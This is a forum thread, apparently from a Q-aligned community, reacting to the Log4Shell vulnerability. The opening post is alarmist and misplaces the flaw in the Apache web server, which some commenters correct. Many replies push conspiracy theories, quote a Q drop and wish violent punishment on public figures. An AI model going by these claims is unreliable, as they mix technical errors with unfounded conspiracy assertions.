Hey there everyone, your friendly neighborhood tech pede here. Not sure how much attention people here pay to tech news but over the past two days there has been a bit of info that's been trickling into even some mainstream news sites about a recently discovered vulnerability called Log4Shell. These sites have been saying how this vulnerability has the potential to be pretty bad. As a guy that's worked in tech for pretty much all my life, let me rephrase that for them. This vulnerability has the potential to be catastrophic.
I work in the civ, non-gov't sector and I have more NDAs signed than I can count so I can't go into specifics of clients or ongoing cases that we're involved in. But we see cases come in where massive companies get their data stolen and ransomed for millions and no one at my work really thinks twice about it because we work with this stuff every day. But this one has us all worried.
What is this vulnerability?
There's a couple jargon filled writeups here:
But long story short, in order for a website or service to be accessible via the Internet, it needs a web server in place. The most widely used one of these is a web server called Apache that's been around for about 25 years. Every web server (and really any application on a computer) keeps a log of everything that it does in order to track errors, see unauthorized access, that kind of thing. This exploit specifically targets this built-in logging feature in Apache in order to gain full access to the web server and drop pretty much anything it wants on it.
So how bad is it?
Bad. Really, really bad. Bad enough that as soon as it was released, it immediately hit the ceiling as a 10.0 out of 10.0 on the CVE index and that was only because the index didn't go higher. For reference, the HAFNIUM exploits from this past February/March that caused hundreds of thousands of mail servers across the globe to have their data stolen and their systems crashed didn't even reach that mark, with most of the affected CVEs for that exploit coming in at 7.8.
Unlike the HAFNIUM exploit, this vulnerability appears to have the potential to be a C2C (computer to computer) worm, which means that once it's infected a web server it can spread uncontrolled to basically any device connected to that web server.
So it only affects these web servers, right?
Not necessarily. Evidence is still coming out but it appears as though this may be able to spread to any device that communicates with an Apache-based web server. The biggest example right now is Minecraft, which released a zero-day patch just yesterday to help protect against this. Basically if you don't have that patch then if you connect to a multiplayer server then you're vulnerable.
But it's not just services like Minecraft. A lot of applications also have what's referred to as integrated web servers, which is where the Apache web server does not exist independently of the application. If it were to be independent, then you could just patch the web server and call it a day. But if it's integrated you need to re-code portions of the ENTIRE application in order to get it updated to protect against this. There's not enough manpower in the world to do this.
Look at the numbers of just websites running Apache alone. There are over 1.7 billion websites in the world and about 32% are known to run Apache. The actual number is most certainly higher. Even in a best-case scenario, we're looking at over 500 million websites that are affected by this.
But again, it's not just websites, it's services as well...especially services that run on Java. You know that fancy satellite radio in your car? That runs on Java and reports to a web server. You know that new TV you got on Black Friday? Yep, that runs Java and reports to a web server. That fancy new smart plug that lets you turn lights on and off from your phone? Take a guess.
Seeing why we're worried?
Well, crap.
Don't worry, it gets worse! So far there have been a list of about 150 international backbone companies that have been seen to be affected by this. These companies range from everything from home devices to antivirus and backup software. Some companies such as Kronos (UKG) have already had their services nuked...whether it's by this vulnerability or not isn't known yet. But Kronos is saying that it will be "several weeks" before things are back functioning again.
https://www.theregister.com/2021/12/13/ultimate_kronos_group_ransomware_attack/
So once this hits a server, it hits FAST and it hits HARD and it goes DOWN.
So these attacks are already happening?
They haven't even really started, that's the fun part. There has been some evidence that these have been circulating to some extent in the wild but there hasn't been a mass-scale attack like we've usually seen. Current insiders are estimating that a worm that can fully take advantage of this C2C spread will be completed and deployed within 24-48 hours:
https://nitter.net/Laughing_Mantis/status/1470165580736987137
So what should I do?
If you're in tech, get your Apache web servers updated immediately. Get off this site and just do it. If you have kids that are running a Minecraft server (hell, just even playing Minecraft on PC in general) then make sure it's updated. Microsoft has more info here:
https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
If you're just a regular tech user then make sure you have a few good, long books just in case things go FUBAR. And strap the fuck in.
Somedays I feel like the Violinist on the Titanic. Just playing along as the ship sinks and slowly starts breaking apart.
Whatever happens. Gentlemen itβs been a privilege memeing with you.
So I guess this means we are going back to the 1880βs whether we want to or not.
Ha lol I have the lamps but no typewriter π dang!
Dang it! I COMPLETELY forgot about a typewriter so I can start writing my memoirs during the cyber apocalypse! π€¦πΌββοΈ
pen & paper also work. ....Or pencil I suppose
typewriter memes
good luck finding ink ribbons!
I have a re-inker and a huge bottle of ink. It works for typewriter ribbons as well as old dot matrix printer ribbons. In fact it was actually designed for the printer ribbons.
Amazon has new ribbons, and they aren't super expensive. Just google "typewriter ribbons."
Ha lol dot matrix say that to anyone 30 or under and watch their face.
I keep all the old tech as it may come in handy someday. It doesn't cost me anything to keep it, but my home office looks like a hoarder's home.
and you probably have your own order in chaos lol talking about specific mindset...
Just remember when your buying a Kerosene lamp to get one with the safety valve so they donβt explode and set fire to your house :-)
Standard old-fashioned kerosene lamps don't explode. They aren't enclosed tightly in any way. There is a glass container to hold the kerosene. There is a metal wick holder on top of that. The wick sticks through that down into the kerosene. There is an adjusting knob to raise and lower the wick. Nothing is sealed. Then there is a glass shade to block drafts and allow the light to shine out.
I have been around kerosene lamps my whole life. I'm looking at three across the room from me right now.
Here's one for just $5.99: https://www.hobbylobby.com/Home-Decor-Frames/Candles-Fragrance/Diffusers-Oils/Oil-Lamplight/p/80645858
One thing you might consider is getting lamp oil instead of kerosene, especially if you have respiratory problems and plan on using one a lot. My plans, if things go south, is to go to bed when it gets dark and get up when it gets light. That dispenses with the need for much lighting. Candles will be sufficient then.
Thank you, I do have lamp oil, plus lots of wick I have several of the old glass oil lamps, fitting since I live in an old farmhouse. π
I have something like that. It still has an outhouse in the back yard. A neighbor still has a pitcher pump in their back yard. I think my area will be fine.
I asked the well guy to put in a hand pump he just laughed at me.
More like 8 thousand BC. Yep more like that.
When you build a system that can be easily destroyed. It gets destroyed.
Why that far back? our minds and human positive ingenuity will still be intact, please we have the knowledge and we can overcome adversity we just need new and better ways to achieve without the chains of corrupt government binding us.
^^ THIS. ^^. Toucheβ
The meme will be with you, always
NEVER LET GO!πΈ
Wow thats a visual i totally understand
Lmfao bro Iβve been saying that to the fam and friends lately hahaha great minds think alike. And at least we are fighting and standing our ground. Not asleep sheeple
Wish I could updoot This ^ X 100
Best advice evar: just stop care
They canβt hack or disable my mountain bikes π²! Bwa ha ha ha
BAM! That's the key alright!
258
The vulnerability is in log4j, not the apache web server. This is a completely separate project also developed by the Apache foundation. It is a Java logging library, and is not used in the apache web server, which is written in C.
It's still a big deal and log4j is very widely used, but to say the web server itself is vulnerable is not true.
I concur with your statement: log4j is a separate Apache project from their very popular web server.
Would be funny if this was true and the ops thing was hyperbole.
This is correct. Log4j is a library used in Java-based platforms that run on Apache. Not all Java platforms use this library, although it is very popular.
It doesn't need to run on apache (which would be something like Apache Tomcat rather than the web server). It's a standalone library, a service could be vulnerable regardless of its hosting platform.
The information I am getting from Infor, which is the product that I consult on, seems to be deleting the log4j*.jar files.
Infor indicates that version 1 files are not affected by this issue. Although there is a vulnerability in version 1 files:
"Affected Versions of Log4J - Any Log4J version prior to v2.15.0 is affected by this specific issue. The version 1 branch of Log4J is vulnerable to other RCE attacks and should be updated."
The part in bold ONLY applies to log4j V2. We run log4j V1. V1 IS NOT AFFECTED BY THIS SPECIFIC ISSUE.
A known vulnerability in v1 - https://logging.apache.org/log4j/1.2/ only applies to the log4j socket server, which we do not use.
From what I could tell it wasnβt a web server thing unless the project included log4j. So it may or may not be used based on what modules are on or plug-ins enabled. I think minecraft does have it for sure but Iβm optimistic about Apache
Its the message lookup feature in log4j is the culprit. Its the built-in JndiLookup plugin which is enabled by default . The message lookup was a bad idea that has other issues besides the one reported. 2.15.0 updates the configuration to disabling all message lookups (which is what it should have been). Many companies don't keep up with JDK updates (which disabled this from working awhile ago which relied on the ability to execute remote code over LDAP/RMI).
And those talking down about this have no idea how many mega-corp level services/site are vulnerable. It may not be in apache itself, but it's in one of the most common packages used with said server.
Apache HTTP server and log4j do not mix at all. log4j is used with Java based web application servers (e.g. Tomcat, Jetty, WebLogic ,etc). Apache is an open source organization that contributes to C, C++, Java based projects. Apache HTTP server is used to distribute content and/or centralize auth/security type settings. Its possible to host directly from Java webapplication server but most big corps don't.
log4j is used in a lot places because overall its high quality library. This is a big black eye for them due to feature creep IMO. I work in security and even this caught me by surprise. In retrospect I'm shocked this wasn't caught earlier but its been out in the open for years. Like I said before though to be successful it depends on a foundation that has been fixed for awhile so shame on companies for being too lazy to keep up with security patches in the OS or Java layers.
Good point. We have our own base servers, but almost everything uses some form of apache libraries. And Log4j-core
As a contractor/consultant, I can confirm most organizations are very far behind in their security updates in general. Newer projects get the newer JDK's usually, and the larger the company, the more likely they have a lot of out-of-date software.
Although there are many reasons for this, the largest I have come across is that most organizations don't have enough knowledge of their full runtime environments to confidently make changes, even security updates of this nature. In many cases, systems are inherited by new people after old people leave, and there is a lot of fear to make changes since a lot of developers I have worked with fail to try to fully understand the product and code they're working on.
The upside is that vulnerabilities that get mass media attention, like this, are usually an exception to the norm and they will attempt to discover and fix the problem as quickly as they can.
And even when you do an audit, you focus on libraries core to function, and going through code of what are clearly ancillary libraries like 'logging' that have been running reliably for years with zero modifications by your crew sounds silly. It's totally understandable.
No apache httpd modules will use log4j, it's a Java library and would be in Java bytecode while apache modules are native executable (e.g. ELF binary in Linux).
Server-side Java applications could be vulnerable. These will typically run in a servlet container such as Apache Tomcat or JBoss and may be served via apache httpd either in a reverse proxy configuration or with mod_jk. So you need to go a bit deeper than a basic Apache httpd + plugins configuration to encounter the vulnerability.
That's still a very use case and is a Really Big Deal, but not as bad as something that would effect all Apache httpd installations. Go back a few years to Heartbleed if you want to see what that looks like.
I get some sick pleasure that this came from the java world β¦
Me too. Sorry not sorry.
u/#q332
Strange timing given GME is at it's lowest point since last February. Clearly a HUGE attack from the hedgies.
Coordinated effort to keep people from selling when the collapse begins?
My first thought seeing this post was βis my GME gonna be okay?β π I love my shares as if they were my children
Did you direct register? There was a nice AMA with one of the senior folks at Computershare who explained that you can easily sell at market value through them. No need to transfer shares back to a broker.
I'm getting the corn oil heated up to fry some fuckin TENDIES man
why cant i see this post?
Well that was an interesting read. I suspected the internet was a target as soon as they began planting seeds about "internet apocalypse'
Yup! Just like the βpandemicβ. Iβm so over Klaus Schwab and his evil minions. I know Iβm supposed to say βmay God have mercy on their soulsβ but really all I can think is βmay they die a thousands deaths, be shown no mercy, and burn in the Lake of Fire for all eternityβ.
Yes! If the world uniting against pedophilia, child trafficking, etc., is ultimately what ushers in the Anti-Christ and judgement, then I say bring it on b/c thatβs the hill I will stand upon to die if I have too. Godβs judgement and the Lake of Fire will be for the wicked and not the righteous that stood up for the most helpless and innocent among us. And once you know about the children itβs kind of hard not to believe in judgement day and hell and heaven. There has to be some kind of eternal anguish for people who commit such evil. π€·πΌββοΈ
I just want the fleas of a thousand camels to infest KS, GS, Fraudci, BG, and all their minions right where it counts π₯!
Q mentioned Apache several times.
#646 is just βApacheβ.
LolππΈ
I love learning something new everyday! You are a teacher. Thanks for the clear information.
Didn't Archbishop Vigano, in his latest vid a few weeks back, say the next crisis after covid would be an internet crisis?
Maybe after that food?
I'll have to re watch it. Just off the top of my head it sounds familiar from watching his video a while back.
Correct, he mentioned an "internet emergency".
https://rumble.com/vpelhb-breaking-exclusive-archbishop-vigano-appeals-for-a-worldwide-anti-globalist.html
I was looking through the details of this today, while applying a mind-numbing number of patches (I work at a massive Corp which everyone knows, so I can't dox myself) ... it looks so damned simple that I can't help but wonder if it was designed this way, and kept hidden for 20+ years for the right moment ... just doesn't look like your typical mistake/oversight-caused vulnerability.
And I have some sneaking suspicions that last week several large-scale penetrations were the reason this was "found" just now .... the damage/operations are already complete.
I need to go back and read the Q posts re: some of those esoteric execution codes. I think some may make sense now ....
I'm 57. I remember the world before the internet and cell phones. The good ole days when when a lie took longer to spread than it did to die off. We'll be fine either way this goes. Not worried one damned bit.
Will this result in comms going down and the dark winter
Recently Iβve been pirating all the decent movies over the last few decades to create a decent movie catalogue, why? Cause fuck em thatβs why.
I hope my Plex server which I keep pressing remind me later on when it asks me to update it, running 24/7 on my Mac Mini M1, wonβt be my downfall.
Good thing is I got rid of my bank account in February, why? Cause fuck em thatβs why.
Y2K has entered the chat
I'm a bit techie dumb so sorry for the question in advance. I am on disability and my bank is Direct Express - I use/access it online. My question is can this affect Social Security, I mean their means of getting funds into bank accounts? Can this affect any bank, any business?
Iβm not particularly tech savvy, but this kind of thing could definitely affect online banking if the problems become widespread. And ATMs and brick-and-mortar banks as well.
I donβt mean to sound any alarms, as no-one really knows whatβs happening, but I definitely sleep better because I have some cash at hand, enough to buy food for several weeks. And I highly recommend having cash. And gold and silver for longer term protection against when shtf. π
I have been buying non-perishable food and stocking up just in case things go down for awhile. It might not be a bad idea for you to do the same. That way you will have food and water if the grid goes down for a bit
Theoretically, yes, but things like this take time to fully take advantage of. Also, threats of this caliber tend to evoke a quick response from tech teams.
I work for a bank, and here's the response we got from the folks that handle the "backend system" - without naming names. They run the backend for a lot of banks. From what I can gather, as far as a bank receiving the funds, shouldn't be an issue - if it is it won't be for long. Hopefully SSA updates any Apache servers they may be running, if any.
"At this time, we have not detected any suspicious activity in our environment as a result of this worldwide vulnerability. In addition to the remediation described above, [company] deploys layered controls to protect against new vulnerability exploits. This includes endpoint detection and response, which makes it more difficult to successfully leverage such a vulnerability, and robust monitoring of and response to anomalous actions on our systems that are likely to follow such a vulnerability exploit."
Who runs the backend?
They may own you, but not me.
Based
Iβm not owned by anyone, however Iβm in human society as it is currently just as millions of others are so if thatβs your definition of βownedβ then yes, however thatβs why Iβm here but Iβm also wide awake unlike some.
369Q is just being blunt but very honest, we have known if anyone has been watching listening to prepare for just about anything and that means ANYTHING!
Thanks for the tldr fren.
Reminds me of a late night infomercial.
βBut donβt worry! It gets worse!β
βDid you think that was all you would get? No, no, no! It gets even worse!β
π
The patch is probably remdesivir or some bullshit theyβre force feeding onto poor unsuspecting IT dipshits
Been working through this for two days straight now. OP is not kidding. Been in tech for many years. This is by far the worst vulnerability ever seen. Great write up OP.
I think the one point left out here, is the spray factor of this vulnerability. Sometimes you have really bad vulnerabilities, but they are really hard to execute. This one, targeting an apache web server, you could just run a script inserting the exploit into the user agent of a standard http request, and boom you have full control of the server, and anything beyond that. This could be sprayed across thousands of sites at a time en mass. So easy to find a vulnerable system, then even easier to exploit it.
This is one for the history books...
The turmoil has not started yet.
Winter is coming....
Then I shall ski.... in the shade.
Kek!
I am ready. Letβs gooooo!
I know right?
I'm laughing so hard, that my tears are salting my popcorn!
Especially with this (linked above):
u/#q332
I am so glad none of my guns have computers in them.
10 days ....
Oh geez! Excellent point.
I'm a bit of a dumbass tech-wise, but yesterday I've seen on the news that about 4000 government websites had to be shut down (In Quebec) for major security vulnerabilities, might be linked
Thank you for the heads up! Iβm not very tech savvy. Should I be concerned about my son playing games like Fortnite or Roblox? Is it best to just stay away from these sites until the issue can be fully resolved?
The exploit depends on a number of factors including which version of Java is hosting the web application, how open engress on network is, are you using default configuration. Basically if the host is running old versions of Java with a wide open network they are at risk. Also they must ignore best programming practices and log user input as-is (which unfortunately a lot of devs do).
Best practice is to sanitize untrusted user input before operation on it (including logging). The fact that log4j has a message lookup feature which is enabled by default was an incredibly stupid design decision but this mistake has been made before by others and its been open source forever and nobody caught it (or kept quite about it anyways).
"sanitize untrusted user input before operation on it"
https://bobby-tables.com/img/xkcd.png
My team is scrambling to fix this right now on our servers. This vulnerability is particularly nasty because even if you don't use Log4J directly, it often shows up as a transitive dependency so you have to update everything. Java has 20% "marketshare" and web servers probably use it at an even greater rate. So this leaves up to 50% of Internet servers with a major vulnerability.
I have 3 teams using this particular library, and they are updating it to the newest patched version. Nobody (including my CISO) seems to be terribly worried about the difficulty in patching.
Excluding a dep isn't hard by itself, but that makes it easy for it to slip by.
All depends. Nothing I've ever worked on has used Java. I always tried to stay away from it, but some internal tools have used it. I've done webdev/sys admin/devop stuff for years.
I do have internal things that use it, or have used it, in the past tho. Wonder if these vulns have something to do with election stealing. Anything public facing could be vulnerable. Could all be a message from WH to let people know they know about it. π€·ββοΈ
I'm personally wondering if I can hack some of my old devices, like the TV or vacuum. I'm just weird like that tho π
Totally. My guess is 99% of servers will be fine in the end because it's an easy upgrade
By the time we know it, the operatives have been in and out, taken what they need, and made comemerative T-Shirts.
The important stuff is already done. This is to let EVERYONE know where they were, and to smoke people out ... turn state's evidence, squeel on their partners-in-crime, etc
Really happy my company is full Microsoft .NET stack right now, haha
Comment from impera
https://www.lunasec.io/docs/blog/log4j-zero-day/
in this thread
https://greatawakening.win/p/140cWrLdlI/massive-hacker-war-targeting-ser/c/
Dutch broadcaster warns of impending chaos
https://nos.nl/artikel/2409383-stilte-voor-de-storm-door-groot-beveiligingsprobleem-dit-gaat-niet-met-een-sisser-aflopen
What about saved offline stuff, like e-books, videos and single player video games. Would they run like normal ?
Saved offline stuff would be good. The only exceptions may be single player games that connect to web services in order to prove they're legit copies. Think stuff like Cyberpunk or whatever. There's a couple hints that Steam may be affected but again, info is still being discovered.
The main concern is that if there's a way for this to spread to your PC through a Java program that connects to an affected server (like they're trying to prevent with Minecraft), then your PC could get encrypted with ransomware or be used to propagate the worm to other computers.
In this case, I think I can say I'm ready. Stay safe.
Tbh, don't worry about it. Minecraft's being used as an example because it's built on old Java code.
I'm long out of "the field" but this, as usual, is a server side problem more than a personal computing one. Java and JavaScript are two entirely different things. The fact you asked the question leads me to believe you're probably not running anything relevant on your PC. π
To the neck beards: I know I'm over simplifyong and misrepresenting the essential underlying truth with the above. A "heads up, Shit Could Hit the Fan globally" is fine, but we don't need to be scaring old ladies.
(Not calling anyone an old lady!)
this comment cracked me up so hard. dies People around me in the coffeeshop now think I may epileptic.
Omg!! Rooftop, Iβm dying! πππππ€£ Please donβt ever change! So glad you took the red pill and joined the based ranks! ππ»
Ha lol thatβs the best one yet! ππππ
Ahaha I'm only 33 but feel like an old lady when I read this post. π I told my husband he would have to summarize. He told me my phone would be fine π€£π€£
Iβm an old lady and Dang proud of my 60 yrs! Iβve been through personal world wars to say the least my real age by life maybe 259π
Hahaha. Uproots for all the neck beards.
Consoles affected? Ps4- Xbox kinda deals.
Hard copy all you can anons. SHTF all around us.
You convinced me. Just blocked all my backups from touching the internet.
Ok. So what your saying is I need to buy some 20lb reams from Dunder Mifflin or the Michael Scott Paper Company and pick up some old filing cabinets?
Post #666
Feb 5 2018 12:16:50 (EST)
Why did the #Memo drop a Friday [& before the SB]?
Did this seem strange to you?
Watch the news.
Rothschild estate sale [Black Forest].
Stock market DIVE [666 - coincidence?].
Soros transfer of wealth.
Dopey FREED.
Marriage for POWER, not LOVE.
Hilton/Roth.
Soros/Clinton.
Etc.
News unlocks MAP.
Think Mirror.
Which team?
THEY don't know.
APACHE.
These people are EVIL.
Still don't believe you are SHEEP to them?
20/20 coming.
PUBLIC is VITAL.
RELEASE of INFO VITAL.
OUTRAGE.
JUSTICE.
Can we simply arrest the opposition w/o first exposing the TRUTH?
FOLLOW THE LIGHT.
Q
So it's an internet version of COVID (If COVID were that deadly) i.e. spreads from web to web via connections ?
It gets ever worse because now we know that the vulnerability has been known for a long time and that even government agencies have used the exploit.
The fact That Alibaba Cloud is the ones who reported the vulnerability, tells us that either A. Alibaba runs a better cloud environment than even that of Microsoft or Amazon or they are rogue actors.
The plus side to all of this that none of SolarWinds products have this vulnerability because a part of this exploit was used during the last attack so they were better prepared.